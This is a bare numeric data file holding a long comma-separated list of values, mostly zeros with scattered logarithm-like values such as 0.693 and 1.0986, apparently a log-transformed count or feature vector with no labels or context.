0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.41610040220442, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.635093354472376, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 6.127701357652087, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 7.917171988845775, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.408770583887592, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0, 0, 0, 0, 0, 0, 1.6094379124341003, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 1.3862943611198906, 1.0986122886681098, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 